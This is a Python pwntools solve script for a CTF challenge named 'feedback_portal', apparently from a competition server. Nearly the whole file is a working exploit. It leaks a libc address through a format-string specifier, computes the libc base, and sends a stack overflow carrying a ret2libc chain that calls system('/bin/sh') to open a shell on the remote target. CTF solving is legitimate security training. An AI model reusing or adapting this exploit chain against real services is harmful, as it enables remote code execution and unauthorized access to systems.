#!/usr/bin/env python3
"""Solve script for the ``feedback_portal`` CTF challenge (pwntools).

Two weaknesses in the target are chained, as the code below shows:

1. the "name" prompt appears to be passed through a printf-style formatter,
   so a ``%N$lx`` specifier leaks a libc return address from the stack;
2. the "feedback" prompt overflows a stack buffer, so the saved return
   address is overwritten with a short ret2libc chain.

Every numeric constant here is specific to one build of the binary and one
libc (the local/remote variants are kept in comments); none of it transfers
to a different build without being recomputed.
"""
from pwn import *

# Sets the pwntools context (arch, OS, endianness) from the target ELF.
context.binary = elf = ELF('./feedback_portal', checksec=False)

# Change if on server
# The libc must match the one on the remote host: every offset below
# (libc_call, POP_RDI, BINSH, symbols["system"]) is read from, or is
# relative to, this file.
libc = ELF('libc.so.6', checksec=False)
#libc = ELF('/usr/lib/libc.so.6', checksec=False)

# Bytes written before the saved return address is reached. Presumably a
# 128-byte buffer plus the saved rbp — TODO confirm against the binary.
OFFSET_TO_RIP = 128 + 8
# Address of a lone `ret` in the (non-PIE) binary; it is placed in front of
# the chain, presumably to keep the stack 16-byte aligned for system().
RET = 0x40101a
#libc_call = libc.sym['__libc_start_main']
# Offset inside libc of the value leaked by the format string below. It is
# hard-coded instead of looked up by symbol (the commented lookup above)
# because, per the comments further down, the leaked slot is presumably
# the return into __libc_start_call_main rather than __libc_start_main.
libc_call = 0x29d90
# local libc
#POP_RDI = 0x10269a
# remote libc
# Offset of a `pop rdi; ret` gadget in libc (local and remote values differ).
POP_RDI = 0x10f78b
# Offset of a "/bin/sh\0" string in libc. This is computed while
# libc.address is still 0, so it is a *relative* offset and the base is
# added by hand when the payload is built.
BINSH = next(libc.search(b'/bin/sh\x00'))

#p = process(elf.path)
p = remote("offsec.m0lecon.it", 13595)

p.recvuntil(b'Please enter your name:\n')
# __libc_start_main (does not work remotely)
#p.sendline(b"%47$lx")
# __libc_start_call_main
# Prints the 25th stack slot as hex via the format string.
p.sendline(b"%25$lx")

# The reply is expected to carry the leaked hex digits after the first
# comma. If the banner changes and no comma is present, [1] raises
# IndexError instead of failing with a useful message.
libc_start_main = p.recvline().split(b',')[1].strip()
libc_start_main = b'0x' + libc_start_main
libc_start_main = int(libc_start_main, 16)

#libc_address = libc_start_main - libc_call - 128 - 8
print(f"Libc start main dropped:{hex(libc_start_main)}")
print(f"Libc start main from symbol:{hex(libc_call)}")
print(f"BINSH:{hex(BINSH)}")
# leak - offset gives the libc base; the mask rounds it down to a page
# boundary. Caveat: the mask also hides a slightly wrong libc_call, so a
# mismatched libc still produces a plausible-looking, page-aligned base and
# the error only surfaces when the chain runs.
libc_address = (libc_start_main - libc_call) & ~0xfff
print(f"Addr: {hex(libc_address)}")
# From here on libc.symbols[...] are rebased to the computed base.
libc.address = libc_address

print(p.recvuntil(b'Now leave your feedback:\n'))
# Overflow padding followed by the ROP chain:
#   ret -> pop rdi; ret -> "/bin/sh" -> system
payload = flat(
b'A' * OFFSET_TO_RIP,
p64(RET),
#elf.symbols["main"],
p64(libc_address + POP_RDI),  # base added manually: POP_RDI is an offset
p64(libc_address + BINSH),  # same for BINSH
libc.symbols["system"]  # already rebased via libc.address above
)
p.send(payload)
#print(p.recvline())
p.interactive()